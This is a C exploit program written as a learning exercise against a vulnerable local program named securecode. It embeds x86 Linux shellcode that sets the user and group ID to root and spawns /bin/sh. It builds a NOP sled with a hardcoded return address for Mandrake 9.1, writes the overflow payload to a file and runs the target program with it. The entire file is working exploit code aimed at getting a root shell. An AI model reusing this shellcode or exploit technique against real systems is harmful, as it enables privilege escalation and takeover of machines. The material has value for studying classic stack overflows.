/* securecode-xp.c
 * 
 *  Vuln: securecode.c //Your know... the one from tidbit...
 *  Info: Program to check for vulns in source code...
 *  Vuln author: Someone else... 
 *  Exploit author: Lucas G. 
 *  Impact: it helped me learn... other than that, almost useless
 *  
 *  Compiling: gcc seccode.c -o seccode
 *  Usage: ./seccode
 *
 *  Tips Make sure the securecode.c program is in the same directory AND
 *  has the same as I have it in the exploit ie:
 *  
 *    execl("./securecode", "securecode","-s","bigbuff", 0);
 *
 *  Credits: 	teleh0r (for his wonderful tutorial bof4kids!
 *  	     	teleh0r for his code that I modiffied.... (thought the
 *  	     code looked familiar?)
 *  	     	Shell coder possibly by c0ntex
 *
 * */
#include <stdio.h>

                    /* kode ripped from kon2.c */

char codez[] =
  /* setuid(0); */
  "\x31\xdb"			/* xor %ebx,%ebx */
  "\x89\xd8"			/* mov %ebx,%eax */
  "\xb0\x17"			/* mov $0x17,%al */
  "\xcd\x80"			/* int $0x80     */
  /* setgid(0); */
  "\x31\xdb"			/* xor %ebx,%ebx */
  "\x89\xd8"			/* mov %ebx,%eax */
  "\xb0\x2e"			/* mov $0x2e,%al */
  "\xcd\x80"			/* int $0x80     */
  /* /bin/sh execve(); */
  "\x31\xc0"			/* xor  %eax,%eax   */
  "\x50"			/* push %eax        */
  "\x68\x2f\x2f\x73\x68"	/* push $0x68732f2f */
  "\x68\x2f\x62\x69\x6e"	/* push $0x6e69622f */
  "\x89\xe3"			/* mov  %esp,%ebx   */
  "\x50"			/* push %eax        */
  "\x53"			/* push %ebx        */
  "\x89\xe1"			/* mov  %esp,%ecx   */
  "\x31\xd2"			/* xor  %edx,%edx   */
  "\xb0\x0b"			/* mov  $0xb,%al    */
  "\xcd\x80"			/* int  $0x80       */
  /* exit(0); */
  "\x31\xdb"			/* xor %ebx,%ebx */
  "\x89\xd8"			/* mov %ebx,%eax */
  "\xb0\x01"			/* mov $0x01,%al */
  "\xcd\x80";			/* int $0x80     */

#define NOP     0x90
#define LEN     289 
#define RET     0xbffff314 //Mandrake 9.1 offset

int main(int argc, char *argv[]) {

    char buffer[LEN];
    long retaddr, offset;
    int i;
    FILE *fp;

    offset = 0;
    if (argc > 1) {
	offset = atol(argv[1]);
    }
    retaddr = RET + offset;

    printf("\n Modified by j0e! Original code from:");
    printf("\n- (c) teleh0r@doglover.com anno 2000 -\n");
    printf("Use : %s [offset] \n", argv[0]);
    printf("Using: address 0x%lx\n\n", retaddr);

    for (i = 0; i < LEN; i += 4)
	*(long *) &buffer[i] = retaddr;
/*The greater the NUM of strlen(codez) - NUM, the more return addresses are 
 * put at the end (and less NOPS in the beggining*/
    for (i = 0; i < (LEN - strlen(codez)-40); ++i)
	*(buffer + i) = NOP;

    memcpy(buffer + i, codez, (strlen(codez)));
    fp = fopen("bigbuff", "w");
    fprintf(fp, "%s",buffer);
    fclose(fp);
    execl("./securecode", "securecode","-s","bigbuff", 0);

    return 0;
}